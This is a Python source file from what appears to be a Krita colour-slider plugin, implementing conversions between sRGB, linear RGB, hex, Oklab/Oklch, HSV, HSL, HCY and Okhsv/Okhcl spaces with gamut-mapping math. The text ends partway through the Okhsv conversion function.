2,288,180 | colorconversion.py | lucifer9683_HCLSliders/hclsliders/colorconversion.py | # SPDX-License-Identifier: GPL-3.0-or-later AND MIT
#
# Color conversion script for python.
# Copyright (C) 2024 Lucifer <krita-artists.org/u/Lucifer>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# This file incorporates work covered by the following copyright and
# permission notice:
#
# Copyright (c) 2021 Björn Ottosson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Pigment.O is a Krita plugin and it is a Color Picker and Color Mixer.
# Copyright ( C ) 2020 Ricardo Jeremias.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# ( at your option ) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import math, sys
# luma coefficents for ITU-R BT.709
Y709R = 0.2126
Y709G = 0.7152
Y709B = 0.0722
# constants for sRGB transfer
ALPHA = 0.055
GAMMA = 2.4
PHI = 12.92
# toe functions
K1 = 0.206
K2 = 0.03
K3 = (1.0 + K1) / (1.0 + K2)
class Convert:
@staticmethod
def roundZero(n: float, d: int):
s = -1 if n < 0 else 1
if not isinstance(d, int):
raise TypeError("decimal places must be an integer")
elif d < 0:
raise ValueError("decimal places has to be 0 or more")
elif d == 0:
return math.floor(abs(n)) * s
f = 10 ** d
return math.floor(abs(n) * f) / f * s
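    # For example, roundZero(1.2399, 2) gives 1.23 and roundZero(-1.2399, 2)
    # gives -1.23: digits past the requested precision are truncated toward zero
    # rather than rounded to nearest.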
@staticmethod
def clampF(f: float, u: float=1, l: float=0):
        # red may be negative for some blue hues because the color is out of gamut
if f < l:
return l
# round up near 1 and prevent going over 1 from oklab conversion
if (u == 1 and f > 0.999999) or f > u:
return u
return f
@staticmethod
def componentToSRGB(c: float):
# round(CHI / PHI, 7) = 0.0031308
return (1 + ALPHA) * c ** (1 / GAMMA) - ALPHA if c > 0.0031308 else c * PHI
@staticmethod
def componentToLinear(c: float):
# CHI = 0.04045
return ((c + ALPHA) / (1 + ALPHA)) ** GAMMA if c > 0.04045 else c / PHI
@staticmethod
def cartesianToPolar(a: float, b: float):
c = math.hypot(a, b)
hRad = math.atan2(b, a)
if hRad < 0:
hRad += math.pi * 2
h = math.degrees(hRad)
return (c, h)
@staticmethod
def polarToCartesian(c: float, h: float):
hRad = math.radians(h)
a = c * math.cos(hRad)
b = c * math.sin(hRad)
return (a, b)
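    # These two are inverses of each other; for instance cartesianToPolar(0.0, 0.1)
    # gives (0.1, 90.0) and polarToCartesian(0.1, 90.0) maps back to roughly
    # (0.0, 0.1), so (a, b) pairs round-trip through chroma and hue.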
@staticmethod
def linearToOklab(r: float, g: float, b: float):
# convert to approximate cone responses
l = 0.4122214708 * r + 0.5363325363 * g + 0.0514459929 * b
m = 0.2119034982 * r + 0.6806995451 * g + 0.1073969566 * b
s = 0.0883024619 * r + 0.2817188376 * g + 0.6299787005 * b
# apply non-linearity
l_ = l ** (1 / 3)
m_ = m ** (1 / 3)
s_ = s ** (1 / 3)
# transform to Lab coordinates
okL = 0.2104542553 * l_ + 0.7936177850 * m_ - 0.0040720468 * s_
okA = 1.9779984951 * l_ - 2.4285922050 * m_ + 0.4505937099 * s_
okB = 0.0259040371 * l_ + 0.7827717662 * m_ - 0.8086757660 * s_
return (okL, okA, okB)
@staticmethod
def oklabToLinear(okL: float, okA: float, okB: float):
# inverse coordinates
l_ = okL + 0.3963377774 * okA + 0.2158037573 * okB
m_ = okL - 0.1055613458 * okA - 0.0638541728 * okB
s_ = okL - 0.0894841775 * okA - 1.2914855480 * okB
# reverse non-linearity
l = l_ * l_ * l_
m = m_ * m_ * m_
s = s_ * s_ * s_
# convert to linear rgb
r = +4.0767416621 * l - 3.3077115913 * m + 0.2309699292 * s
g = -1.2684380046 * l + 2.6097574011 * m - 0.3413193965 * s
b = -0.0041960863 * l - 0.7034186147 * m + 1.7076147010 * s
return(r, g, b)
@staticmethod
# toe function for L_r
def toe(x):
return 0.5 * (K3 * x - K1 + ((K3 * x - K1) * (K3 * x - K1) + 4 * K2 * K3 * x) ** (1 / 2))
@staticmethod
# inverse toe function for L_r
def toeInv(x):
return (x * x + K1 * x) / (K3 * (x + K2))
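    # toe() and toeInv() are inverses mapping Oklab lightness to the reference
    # lightness L_r used by okhsl/okhsv; both fix the endpoints, so toe(0.0) is 0.0
    # and toe(1.0) is 1.0 (up to floating point error).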
@staticmethod
# Finds the maximum saturation possible for a given hue that fits in sRGB
# Saturation here is defined as S = C/L
# a and b must be normalized so a^2 + b^2 == 1
def computeMaxSaturation(a: float, b: float):
# Max saturation will be when one of r, g or b goes below zero.
# Select different coefficients depending on which component goes below zero first
# Blue component
k0 = +1.35733652
k1 = -0.00915799
k2 = -1.15130210
k3 = -0.50559606
k4 = +0.00692167
wl = -0.0041960863
wm = -0.7034186147
ws = +1.7076147010
if -1.88170328 * a - 0.80936493 * b > 1:
# Red component
k0 = +1.19086277
k1 = +1.76576728
k2 = +0.59662641
k3 = +0.75515197
k4 = +0.56771245
wl = +4.0767416621
wm = -3.3077115913
ws = +0.2309699292
elif 1.81444104 * a - 1.19445276 * b > 1:
# Green component
k0 = +0.73956515
k1 = -0.45954404
k2 = +0.08285427
k3 = +0.12541070
k4 = +0.14503204
wl = -1.2684380046
wm = +2.6097574011
ws = -0.3413193965
# Approximate max saturation using a polynomial:
maxS = k0 + k1 * a + k2 * b + k3 * a * a + k4 * a * b
# Do one step Halley's method to get closer
        # this gives an error of less than 1e-6,
# except for some blue hues where the dS/dh is close to infinite
# this should be sufficient for most applications, otherwise do two/three steps
k_l = +0.3963377774 * a + 0.2158037573 * b
k_m = -0.1055613458 * a - 0.0638541728 * b
k_s = -0.0894841775 * a - 1.2914855480 * b
l_ = 1.0 + maxS * k_l
m_ = 1.0 + maxS * k_m
s_ = 1.0 + maxS * k_s
l = l_ * l_ * l_
m = m_ * m_ * m_
s = s_ * s_ * s_
l_dS = 3.0 * k_l * l_ * l_
m_dS = 3.0 * k_m * m_ * m_
s_dS = 3.0 * k_s * s_ * s_
l_dS2 = 6.0 * k_l * k_l * l_
m_dS2 = 6.0 * k_m * k_m * m_
s_dS2 = 6.0 * k_s * k_s * s_
f = wl * l + wm * m + ws * s
f1 = wl * l_dS + wm * m_dS + ws * s_dS
f2 = wl * l_dS2 + wm * m_dS2 + ws * s_dS2
maxS = maxS - f * f1 / (f1*f1 - 0.5 * f * f2)
return maxS
@staticmethod
# finds L_cusp and C_cusp for a given hue
# a and b must be normalized so a^2 + b^2 == 1
def findCuspLC(a: float, b: float):
# First, find the maximum saturation (saturation S = C/L)
maxS = Convert.computeMaxSaturation(a, b)
# Convert to linear sRGB to find the first point where at least one of r,g or b >= 1:
maxRgb = Convert.oklabToLinear(1, maxS * a, maxS * b)
cuspL = (1.0 / max(maxRgb[0], maxRgb[1], maxRgb[2])) ** (1 / 3)
cuspC = cuspL * maxS
return (cuspL, cuspC)
@staticmethod
# Finds intersection of the line defined by
# L = L0 * (1 - t) + t * L1
# C = t * C1
# a and b must be normalized so a^2 + b^2 == 1
def findGamutIntersection(a: float, b: float, l1: float, c1: float, l0: float, cuspLC=None):
# Find the cusp of the gamut triangle
if cuspLC is None:
cuspLC = Convert.findCuspLC(a, b)
# Find the intersection for upper and lower half separately
if ((l1 - l0) * cuspLC[1] - (cuspLC[0] - l1) * c1) <= 0.0:
# Lower half
t = cuspLC[1] * l0 / (c1 * cuspLC[0] + cuspLC[1] * (l0 - l1))
else:
# Upper half
# First intersect with triangle
t = cuspLC[1] * (l0 - 1.0) / (c1 * (cuspLC[0] - 1.0) + cuspLC[1] * (l0 - l1))
# Then one step Halley's method
dL = l1 - l0
dC = c1
k_l = +0.3963377774 * a + 0.2158037573 * b
k_m = -0.1055613458 * a - 0.0638541728 * b
k_s = -0.0894841775 * a - 1.2914855480 * b
l_dt = dL + dC * k_l
m_dt = dL + dC * k_m
s_dt = dL + dC * k_s
# If higher accuracy is required, 2 or 3 iterations of the following block can be used:
l = l0 * (1.0 - t) + t * l1
c = t * c1
l_ = l + c * k_l
m_ = l + c * k_m
s_ = l + c * k_s
l = l_ * l_ * l_
m = m_ * m_ * m_
s = s_ * s_ * s_
ldt = 3 * l_dt * l_ * l_
mdt = 3 * m_dt * m_ * m_
sdt = 3 * s_dt * s_ * s_
ldt2 = 6 * l_dt * l_dt * l_
mdt2 = 6 * m_dt * m_dt * m_
sdt2 = 6 * s_dt * s_dt * s_
r = 4.0767416621 * l - 3.3077115913 * m + 0.2309699292 * s - 1
r1 = 4.0767416621 * ldt - 3.3077115913 * mdt + 0.2309699292 * sdt
r2 = 4.0767416621 * ldt2 - 3.3077115913 * mdt2 + 0.2309699292 * sdt2
u_r = r1 / (r1 * r1 - 0.5 * r * r2)
t_r = -r * u_r
g = -1.2684380046 * l + 2.6097574011 * m - 0.3413193965 * s - 1
g1 = -1.2684380046 * ldt + 2.6097574011 * mdt - 0.3413193965 * sdt
g2 = -1.2684380046 * ldt2 + 2.6097574011 * mdt2 - 0.3413193965 * sdt2
u_g = g1 / (g1 * g1 - 0.5 * g * g2)
t_g = -g * u_g
b = -0.0041960863 * l - 0.7034186147 * m + 1.7076147010 * s - 1
b1 = -0.0041960863 * ldt - 0.7034186147 * mdt + 1.7076147010 * sdt
b2 = -0.0041960863 * ldt2 - 0.7034186147 * mdt2 + 1.7076147010 * sdt2
u_b = b1 / (b1 * b1 - 0.5 * b * b2)
t_b = -b * u_b
t_r = t_r if u_r >= 0.0 else sys.float_info.max
t_g = t_g if u_g >= 0.0 else sys.float_info.max
t_b = t_b if u_b >= 0.0 else sys.float_info.max
t += min(t_r, t_g, t_b)
return t
@staticmethod
def cuspToST(cuspLC: tuple):
l: float = cuspLC[0]
c: float = cuspLC[1]
return (c / l, c / (1 - l))
# Returns a smooth approximation of the location of the cusp
# This polynomial was created by an optimization process
# It has been designed so that S_mid < S_max and T_mid < T_max
@staticmethod
def getMidST(a_: float, b_: float):
s = 0.11516993 + 1.0 / (+7.44778970 + 4.15901240 * b_
+ a_ * (-2.19557347 + 1.75198401 * b_
+ a_ * (-2.13704948 - 10.02301043 * b_
+ a_ * (-4.24894561 + 5.38770819 * b_ + 4.69891013 * a_
))))
t = 0.11239642 + 1.0 / (+1.61320320 - 0.68124379 * b_
+ a_ * (+0.40370612 + 0.90148123 * b_
+ a_ * (-0.27087943 + 0.61223990 * b_
+ a_ * (+0.00299215 - 0.45399568 * b_ - 0.14661872 * a_
))))
return (s, t)
@staticmethod
def getCs(l: float, a_: float, b_: float):
cuspLC = Convert.findCuspLC(a_, b_)
cMax = Convert.findGamutIntersection(a_, b_, l, 1, l, cuspLC)
maxST = Convert.cuspToST(cuspLC)
# Scale factor to compensate for the curved part of gamut shape:
k = cMax / min(l * maxST[0], (1 - l) * maxST[1])
midST = Convert.getMidST(a_, b_)
# Use a soft minimum function,
# instead of a sharp triangle shape to get a smooth value for chroma.
cMid = 0.9 * k * (1 / (1 / (l * midST[0]) ** 4 + 1 / ((1 - l) * midST[1]) ** 4)) ** (1 / 4)
# for C_0, the shape is independent of hue, so ST are constant.
# Values picked to roughly be the average values of ST.
c0 = (1 / (1 / (l * 0.4) ** 2 + 1 / ((1 - l) * 0.8) ** 2)) ** (1 / 2)
return (c0, cMid, cMax)
@staticmethod
def rgbToTRC(rgb: tuple, trc: str):
if trc == "sRGB":
r = Convert.clampF(Convert.componentToSRGB(rgb[0]))
g = Convert.clampF(Convert.componentToSRGB(rgb[1]))
b = Convert.clampF(Convert.componentToSRGB(rgb[2]))
return (r, g, b)
else:
r = Convert.componentToLinear(rgb[0])
g = Convert.componentToLinear(rgb[1])
b = Convert.componentToLinear(rgb[2])
return (r, g, b)
@staticmethod
def rgbFToInt8(r: float, g: float, b: float, trc: str):
if trc == "sRGB":
r = int(r * 255)
g = int(g * 255)
b = int(b * 255)
else:
r = round(Convert.componentToSRGB(r) * 255)
g = round(Convert.componentToSRGB(g) * 255)
b = round(Convert.componentToSRGB(b) * 255)
return (r, g, b)
@staticmethod
def rgbFToHexS(r: float, g: float, b: float, trc: str):
# hex codes are in 8 bits per color
rgb = Convert.rgbFToInt8(r, g, b, trc)
# hex converts int to str with first 2 char being 0x
r = hex(rgb[0])[2:].zfill(2).upper()
g = hex(rgb[1])[2:].zfill(2).upper()
b = hex(rgb[2])[2:].zfill(2).upper()
return f"#{r}{g}{b}"
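    # Quick illustration: rgbFToHexS(1.0, 0.5, 0.0, "sRGB") yields "#FF7F00",
    # since 0.5 * 255 truncates to 127 (0x7F).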
@staticmethod
def hexSToRgbF(syntax: str, trc: str):
if len(syntax) != 7:
print("Invalid syntax")
return
try:
r = int(syntax[1:3], 16) / 255.0
g = int(syntax[3:5], 16) / 255.0
b = int(syntax[5:7], 16) / 255.0
except ValueError:
print("Invalid syntax")
return
if trc == "sRGB":
return (r, g, b)
r = Convert.componentToLinear(r)
g = Convert.componentToLinear(g)
b = Convert.componentToLinear(b)
return (r, g, b)
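    # Going the other way, hexSToRgbF("#FF7F00", "sRGB") returns (1.0, 127 / 255, 0.0);
    # with trc == "linear" the same components are additionally passed through
    # componentToLinear().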
@staticmethod
def rgbFToOklabS(r: float, g: float, b: float, trc: str):
# if rgb not linear, convert to linear for oklab conversion
if trc == "sRGB":
r = Convert.componentToLinear(r)
g = Convert.componentToLinear(g)
b = Convert.componentToLinear(b)
oklab = Convert.linearToOklab(r, g, b)
        # l in percentage, a and b are roughly -0.3 to 0.3
okL = round(oklab[0] * 100, 2)
okA = Convert.roundZero(oklab[1], 4)
okB = Convert.roundZero(oklab[2], 4)
return f"oklab({okL}% {okA} {okB})"
@staticmethod
def oklabSToRgbF(syntax: str, trc: str):
strings = syntax[5:].strip("( )").split()
if len(strings) != 3:
print("Invalid syntax")
return
okL = strings[0]
okA = strings[1]
okB = strings[2]
try:
if "%" in okL:
okL = Convert.clampF(float(okL.strip("%")) / 100)
else:
okL = Convert.clampF(float(okL))
if "%" in okA:
okA = Convert.clampF(float(okA.strip("%")) / 250, 0.4, -0.4)
else:
okA = Convert.clampF(float(okA), 0.4, -0.4)
if "%" in okB:
okB = Convert.clampF(float(okB.strip("%")) / 250, 0.4, -0.4)
else:
okB = Convert.clampF(float(okB), 0.4, -0.4)
except ValueError:
print("Invalid syntax")
return
rgb = Convert.oklabToLinear(okL, okA, okB)
# if rgb not linear, perform transfer functions for components
r = Convert.componentToSRGB(rgb[0]) if trc == "sRGB" else rgb[0]
g = Convert.componentToSRGB(rgb[1]) if trc == "sRGB" else rgb[1]
b = Convert.componentToSRGB(rgb[2]) if trc == "sRGB" else rgb[2]
return (Convert.clampF(r), Convert.clampF(g), Convert.clampF(b))
@staticmethod
def rgbFToOklchS(r: float, g: float, b: float, trc: str):
# if rgb not linear, convert to linear for oklab conversion
if trc == "sRGB":
r = Convert.componentToLinear(r)
g = Convert.componentToLinear(g)
b = Convert.componentToLinear(b)
oklab = Convert.linearToOklab(r, g, b)
l = round(oklab[0] * 100, 2)
ch = Convert.cartesianToPolar(oklab[1], oklab[2])
c = ch[0]
h = 0
# chroma of neutral colors will not be exactly 0 due to floating point errors
if c < 0.000001:
c = 0
else:
# chroma adjustment due to rounding up blue hue
if 264.052 < ch[1] < 264.06:
h = 264.06
c = round(c - 0.0001, 4)
else:
h = round(ch[1], 2)
c = Convert.roundZero(c, 4)
# l in percentage, c is 0 to 0.3+, h in degrees
return f"oklch({l}% {c} {h})"
@staticmethod
def oklchSToRgbF(syntax: str, trc: str):
strings = syntax[5:].strip("( )").split()
if len(strings) != 3:
print("Invalid syntax")
return
l = strings[0]
c = strings[1]
h = strings[2]
try:
if "%" in l:
l = Convert.clampF(float(l.strip("%")) / 100)
else:
l = Convert.clampF(float(l))
if "%" in c:
c = Convert.clampF(float(c.strip("%")) / 250, 0.4)
else:
c = Convert.clampF(float(c), 0.4)
h = Convert.clampF(float(h.strip("deg")), 360.0)
except ValueError:
print("Invalid syntax")
return
# clip chroma if exceed sRGB gamut
ab = Convert.polarToCartesian(1, h)
if c:
u = Convert.findGamutIntersection(*ab, l, 1, l)
if c > u:
c = u
rgb = Convert.oklabToLinear(l, ab[0] * c, ab[1] * c)
# if rgb not linear, perform transfer functions for components
r = Convert.componentToSRGB(rgb[0]) if trc == "sRGB" else rgb[0]
g = Convert.componentToSRGB(rgb[1]) if trc == "sRGB" else rgb[1]
b = Convert.componentToSRGB(rgb[2]) if trc == "sRGB" else rgb[2]
return (Convert.clampF(r), Convert.clampF(g), Convert.clampF(b))
@staticmethod
def hSectorToRgbF(hSector: float, v: float, m: float, x: float, trc: str="sRGB"):
# assign max, med and min according to hue sector
if hSector == 1: # between yellow and green
r = x
g = v
b = m
elif hSector == 2: # between green and cyan
r = m
g = v
b = x
elif hSector == 3: # between cyan and blue
r = m
g = x
b = v
elif hSector == 4: # between blue and magenta
r = x
g = m
b = v
elif hSector == 5: # between magenta and red
r = v
g = m
b = x
else: # between red and yellow
r = v
g = x
b = m
# convert to linear if not sRGB
if trc == "sRGB":
return (r, g, b)
r = Convert.componentToLinear(r)
g = Convert.componentToLinear(g)
b = Convert.componentToLinear(b)
return (r, g, b)
@staticmethod
def rgbFToHsv(r: float, g: float, b: float, trc: str):
# if rgb is linear, convert to sRGB
if trc == "linear":
r = Convert.componentToSRGB(r)
g = Convert.componentToSRGB(g)
b = Convert.componentToSRGB(b)
# value is equal to max(R,G,B) while min(R,G,B) determines saturation
v = max(r,g,b)
m = min(r,g,b)
# chroma is the colorfulness of the color compared to the neutral color of equal value
c = v - m
if c == 0:
# hue cannot be determined if the color is neutral
return (0, 0, round(v * 100, 2))
# hue is defined in 60deg sectors
# hue = primary hue + deviation
# max(R,G,B) determines primary hue while med(R,G,B) determines deviation
# deviation has a range of -0.999... to 0.999...
if v == r:
# red is 0, range of hues that are predominantly red is -0.999... to 0.999...
# dividing (g - b) by chroma takes saturation and value out of the equation
# resulting in hue deviation of the primary color
h = ((g - b) / c) % 6
elif v == g:
# green is 2, range of hues that are predominantly green is 1.000... to 2.999...
h = (b - r) / c + 2
elif v == b:
# blue is 4, range of hues that are predominantly blue is 3.000... to 4.999...
h = (r - g) / c + 4
# saturation is the ratio of chroma of the color to the maximum chroma of equal value
# which is normalized chroma to fit the range of 0-1
s = c / v
return (round(h * 60, 2), round(s * 100, 2), round(v * 100, 2))
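    # Worked example: rgbFToHsv(1.0, 0.5, 0.0, "sRGB") gives (30.0, 100.0, 100.0),
    # a fully saturated orange at full value whose hue sits between red and yellow.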
@staticmethod
def hsvToRgbF(h: float, s: float, v: float, trc: str):
# derive hue in 60deg sectors
h /= 60
hSector = int(h)
# scale saturation and value range from 0-100 to 0-1
s /= 100
v /= 100
# max(R,G,B) = value
# chroma = saturation * value
# min(R,G,B) = max(R,G,B) - chroma
m = v * (1 - s)
# calculate deviation from closest secondary color with range of -0.999... to 0.999...
        # |deviation| = 1 - (derived hue - hue sector) if deviation is positive
# |deviation| = derived hue - hue sector if deviation is negative
d = h - hSector if hSector % 2 else 1 - (h - hSector)
# med(R,G,B) = max(R,G,B) - (|deviation| * chroma)
x = v * (1 - d * s)
return Convert.hSectorToRgbF(hSector, v, m, x, trc)
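    # The inverse round-trips the example above: hsvToRgbF(30.0, 100.0, 100.0, "sRGB")
    # lands back on (1.0, 0.5, 0.0) via the red-to-yellow sector of hSectorToRgbF().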
@staticmethod
def rgbFToHsl(r: float, g: float, b: float, trc: str):
# if rgb is linear, convert to sRGB
if trc == "linear":
r = Convert.componentToSRGB(r)
g = Convert.componentToSRGB(g)
b = Convert.componentToSRGB(b)
v = max(r,g,b)
m = min(r,g,b)
# lightness is defined as the midrange of the RGB components
l = (v + m) / 2
c = v - m
# hue cannot be determined if the color is neutral
if c == 0:
return (0, 0, round(l * 100, 2))
# same formula as hsv to find hue
if v == r:
h = ((g - b) / c) % 6
elif v == g:
h = (b - r) / c + 2
elif v == b:
h = (r - g) / c + 4
# saturation = chroma / chroma range
# max chroma range when lightness at half
s = c / (1 - abs(2 * l - 1))
return (round(h * 60, 2), round(s * 100, 2), round(l * 100, 2))
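    # For the same orange, rgbFToHsl(1.0, 0.5, 0.0, "sRGB") gives (30.0, 100.0, 50.0):
    # identical hue, but lightness is the midrange of the components instead of the maximum.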
@staticmethod
def hslToRgbF(h: float, s: float, l: float, trc: str):
# derive hue in 60deg sectors
h /= 60
hSector = int(h)
# scale saturation and value range from 0-100 to 0-1
s /= 100
l /= 100
# max(R,G,B) = s(l) + l if l<0.5 else s(1 - l) + l
v = l * (1 + s) if l < 0.5 else s * (1 - l) + l
m = 2 * l - v
# calculate deviation from closest secondary color with range of -0.999... to 0.999...
d = h - hSector if hSector % 2 else 1 - (h - hSector)
x = v - d * (v - m)
return Convert.hSectorToRgbF(hSector, v, m, x, trc)
@staticmethod
def rgbFToHcy(r: float, g: float, b: float, h: float, trc: str, luma: bool):
# if y should always be luma, convert to sRGB
if luma and trc == "linear":
r = Convert.componentToSRGB(r)
g = Convert.componentToSRGB(g)
b = Convert.componentToSRGB(b)
# y can be luma or relative luminance depending on rgb format
y = Y709R * r + Y709G * g + Y709B * b
v = max(r, g, b)
m = min(r, g, b)
c = v - m
yHue = 0
# if color is neutral, use previous hue to calculate luma coefficient of hue
        # max(R,G,B) coefficient + med(R,G,B) coefficient * deviation from max(R,G,B) hue
if (c != 0 and v == g) or (c == 0 and 60 <= h <= 180):
h = (b - r) / c + 2 if c != 0 else h / 60
if 1 <= h <= 2: # between yellow and green
d = h - 1
# luma coefficient of hue ranges from 0.9278 to 0.7152
yHue = Y709G + Y709R * (1 - d)
elif 2 < h <= 3: # between green and cyan
d = h - 2
# luma coefficient of hue ranges from 0.7152 to 0.7874
yHue = Y709G + Y709B * d
elif (c != 0 and v == b) or (c == 0 and 180 < h <= 300):
h = (r - g) / c + 4 if c != 0 else h / 60
if 3 < h <= 4: # between cyan and blue
d = h - 3
# luma coefficient of hue ranges from 0.7874 to 0.0722
yHue = Y709B + Y709G * (1 - d)
elif 4 < h <= 5: # between blue and magenta
d = h - 4
# luma coefficient of hue ranges from 0.0722 to 0.2848
yHue = Y709B + Y709R * d
elif (c != 0 and v == r) or (c == 0 and (h > 300 or h < 60)):
h = ((g - b) / c) % 6 if c != 0 else h / 60
if 5 < h <= 6: # between magenta and red
d = h - 5
# luma coefficient of hue ranges from 0.2848 to 0.2126
yHue = Y709R + Y709B * (1 - d)
elif 0 <= h < 1: # between red and yellow
d = h
# luma coefficient of hue ranges from 0.2126 to 0.9278
yHue = Y709R + Y709G * d
# calculate upper limit of chroma for hue and luma pair
u = y / yHue if y <= yHue else (1 - y) / (1 - yHue)
return (round(h * 60, 2), round(c * 100, 3), round(y * 100, 2), round(u * 100, 3))
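    # Worked example: the orange (1.0, 0.5, 0.0) has luma 0.2126 + 0.7152 * 0.5 = 0.5702,
    # so rgbFToHcy(1.0, 0.5, 0.0, 0, "sRGB", True) returns roughly
    # (30.0, 100.0, 57.02, 100.0), with chroma already at its upper limit.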
@staticmethod
def hcyToRgbF(h: float, c: float, y: float, u: float, trc: str, luma: bool):
# derive hue in 60deg sectors
h /= 60
hSector = int(h)
# pass in y and u as -1 for max chroma conversions
if y != -1:
# scale luma to 1
y /= 100
if c == 0 or y == 0 or y == 1:
# if y is always luma, convert to linear
if luma and trc == "linear":
y = Convert.componentToLinear(y)
# luma coefficients add up to 1
return (y, y, y)
# calculate deviation from closest primary color with range of -0.999... to 0.999...
        # |deviation| = 1 - (derived hue - hue sector) if deviation is negative
# |deviation| = derived hue - hue sector if deviation is positive
d = h - hSector if hSector % 2 == 0 else 1 - (h - hSector)
# calculate luma coefficient of hue
yHue = 0
if hSector == 1: # between yellow and green
yHue = Y709G + Y709R * d
elif hSector == 2: # between green and cyan
yHue = Y709G + Y709B * d
elif hSector == 3: # between cyan and blue
yHue = Y709B + Y709G * d
elif hSector == 4: # between blue and magenta
yHue = Y709B + Y709R * d
elif hSector == 5: # between magenta and red
yHue = Y709R + Y709B * d
else: # between red and yellow
yHue = Y709R + Y709G * d
# when chroma is at maximum, y = luma coefficient of hue
if y == -1:
y = yHue
# it is not always possible for chroma to be constant when adjusting hue or luma
        # adjustments have to either clip chroma or keep saturation consistent instead
cMax = y / yHue if y <= yHue else (1 - y) / (1 - yHue)
if u == -1:
# scale chroma to 1 before comparing
c /= 100
# clip chroma to new limit
if c > cMax:
c = cMax
else:
# scale chroma to hue or luma adjustment
s = 0
if u:
s = c / u
c = s * cMax
# luma = max(R,G,B) * yHue + min(R,G,B) * (1 - yHue)
# calculate min(R,G,B) based on the equation above
m = y - c * yHue
# med(R,G,B) = min(R,G,B) + (|deviation| * chroma)
x = y - c * (yHue - d)
# max(R,G,B) = min(R,G,B) + chroma
v = y + c * (1 - yHue)
# if y is always luma, hsector to rgbf needs trc param
if luma:
return Convert.hSectorToRgbF(hSector, v, m, x, trc)
return Convert.hSectorToRgbF(hSector, v, m, x)
@staticmethod
def rgbFToOkhcl(r: float, g: float, b: float, h: float, trc: str):
# if rgb not linear, convert to linear for oklab conversion
if trc == "sRGB":
r = Convert.componentToLinear(r)
g = Convert.componentToLinear(g)
b = Convert.componentToLinear(b)
oklab = Convert.linearToOklab(r, g, b)
l = oklab[0]
ch = Convert.cartesianToPolar(oklab[1], oklab[2])
c = ch[0]
# chroma of neutral colors will not be exactly 0 due to floating point errors
if c < 0.000001:
            # use current hue to calculate chroma limit in sRGB gamut for neutral colors
ab = Convert.polarToCartesian(1, h)
cuspLC = Convert.findCuspLC(*ab)
u = Convert.findGamutIntersection(*ab, l, 1, l, cuspLC)
u /= cuspLC[1]
c = 0
else:
# gamut intersection jumps for parts of blue
h = ch[1] if not 264.052 < ch[1] < 264.06 else 264.06
# a and b must be normalized to c = 1 to calculate chroma limit in sRGB gamut
a_ = oklab[1] / c
b_ = oklab[2] / c
cuspLC = Convert.findCuspLC(a_, b_)
u = Convert.findGamutIntersection(a_, b_, l, 1, l, cuspLC)
if c > u:
c = u
u /= cuspLC[1]
c /= cuspLC[1]
l = Convert.toe(l)
return (round(h, 2), round(c * 100, 3), round(l * 100, 2), round(u * 100, 3))
@staticmethod
def okhclToRgbF(h: float, c: float, l: float, u: float, trc: str):
# convert lref back to okL
l = Convert.toeInv(l / 100)
# clip chroma if exceed sRGB gamut
ab = (0, 0)
if c:
ab = Convert.polarToCartesian(1, h)
cuspLC = Convert.findCuspLC(*ab)
cMax = Convert.findGamutIntersection(*ab, l, 1, l, cuspLC)
if u == -1:
c = c / 100 * cuspLC[1]
if c > cMax:
c = cMax
else:
s = c / u
c = s * cMax
ab = Convert.polarToCartesian(c, h)
rgb = Convert.oklabToLinear(l, *ab)
# perform transfer functions for components if output to sRGB
r = Convert.componentToSRGB(rgb[0]) if trc == "sRGB" else rgb[0]
g = Convert.componentToSRGB(rgb[1]) if trc == "sRGB" else rgb[1]
b = Convert.componentToSRGB(rgb[2]) if trc == "sRGB" else rgb[2]
return (Convert.clampF(r), Convert.clampF(g), Convert.clampF(b))
@staticmethod
def rgbFToOkhsv(r: float, g: float, b: float, trc: str):
# if rgb not linear, convert to linear for oklab conversion
if trc == "sRGB":
r = Convert.componentToLinear(r)
g = Convert.componentToLinear(g)
b = Convert.componentToLinear(b)
oklab = Convert.linearToOklab(r, g, b)
l = oklab[0]
ch = Convert.cartesianToPolar(oklab[1], oklab[2])
c = ch[0]
# chroma of neutral colors will not be exactly 0 due to floating point errors
if c < 0.000001:
return (0, 0, round(Convert.toe(l) * 100, 2))
else:
# gamut intersection jumps for parts of blue
h = ch[1] if not 264.052 < ch[1] < 264.06 else 264.06
# a and b must be normalized to c = 1 to calculate chroma limit in sRGB gamut
a_ = oklab[1] / c
b_ = oklab[2] / c
cuspLC = Convert.findCuspLC(a_, b_)
st = Convert.cuspToST(cuspLC)
sMax = st[0]
tMax = st[1]
s0 = 0.5
k = 1 - s0 / sMax
# first we find L_v, C_v, L_vt and C_vt
t = tMax / (c + l * tMax)
l_v = t * l
c_v = t * c
l_vt = Convert.toeInv(l_v)
c_vt = c_v * l_vt / l_v
# we can then use these to invert the step that compensates for the toe
# and the curved top part of the triangle:
rgbScale = Convert.oklabToLinear(l_vt, a_ * c_vt, b_ * c_vt)
